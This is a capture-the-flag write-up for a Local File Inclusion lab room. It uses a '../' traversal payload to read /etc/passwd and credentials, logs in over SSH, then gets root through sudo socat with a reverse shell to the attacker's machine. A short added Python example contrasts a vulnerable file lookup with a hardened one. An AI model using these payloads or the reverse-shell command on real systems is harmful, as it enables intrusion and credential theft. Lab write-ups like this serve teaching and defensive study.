Local File Inclusion

An awesome room for a basic understanding of Local File Inclusion.

This will be a quick write-up, so let’s get started.

ENUMERATION

Clearly, ports 80 and 22 are open. Browsing to port 80, there are various articles that are worth a read.

Okay, so after navigating to one of them (say LFI-attack), a strange query shows up in the URL:

?name=lfiattack

This indicates that the website is including information from somewhere else, which points us towards a Local File Inclusion attack.

LFI attacks happen when the input is not sanitised properly.

We saw in the nmap results that port 22 is open, so in the URL replace name=lfiattack with name=../../../../../etc/passwd

Each ../ moves up one directory, so the path climbs until it ends up at the root directory, and from there it points at /etc/passwd.
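The root cause and its fix, as an added example that is not part of the original write-up or the room's own code: a file lookup that joins the `name` parameter to a base directory unchecked, next to a version that resolves the path and refuses anything outside that directory. The function names and the sandbox layout (a temporary directory with a stand-in `etc/passwd`) are assumptions made for illustration.

```python
import os
import tempfile

def read_article_vulnerable(base_dir, name):
    # Vulnerable pattern: the request parameter is joined to the base
    # directory as-is, so "../" sequences climb out of base_dir.
    with open(os.path.join(base_dir, name), "r") as fh:
        return fh.read()

def read_article_hardened(base_dir, name):
    # Resolve ".." and symlinks first, then require that the result is a
    # regular file that still lives under base_dir before opening it.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base or not os.path.isfile(target):
        raise PermissionError("rejected article name: %r" % name)
    with open(target, "r") as fh:
        return fh.read()

def is_blocked(base_dir, name):
    try:
        read_article_hardened(base_dir, name)
        return False
    except PermissionError:
        return True

def demo():
    # Constructed sandbox: <root>/site/articles holds the articles and
    # <root>/etc/passwd stands in for a sensitive file outside of it.
    root = tempfile.mkdtemp()
    articles = os.path.join(root, "site", "articles")
    os.makedirs(articles)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(articles, "lfiattack"), "w") as fh:
        fh.write("article body")
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("constructed-secret")
    return {
        "vulnerable": read_article_vulnerable(articles, "../../etc/passwd"),
        "normal": read_article_hardened(articles, "lfiattack"),
        "traversal_blocked": is_blocked(articles, "../../etc/passwd"),
        # os.path.join drops base_dir entirely when name is absolute
        "absolute_blocked": is_blocked(articles, os.path.join(root, "etc", "passwd")),
    }

if __name__ == "__main__":
    print(demo())
```

The check runs on the resolved path rather than on the raw string, so encoded or nested `../` variants that survive a string filter are still rejected once they resolve outside the base directory.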

Hit Ctrl+U and you’ll find the content in nice format along with nice credentials in the end!!!! ;-)

Get back to your machine and ssh to falconfeast.

Look around and you’ll get your first flag.

PRIVILEGE ESCALATION

By checking the current sudo privileges, there’s nice socat sudo access :-)

We’ll now set up the connection to the remote machine, i.e. our machine.

Run this on the attacker machine:- socat file:`tty`,raw,echo=0 tcp-listen:1234

and on falcon run this:- sudo socat tcp-connect:<your_ip>:1234 exec:bash,pty,stderr,setsid,sigint,sane

YES!!! Got the root access!! Look around and answer the second question asked.

That’s all for now!!

Until next time,

Stay Humble always!!
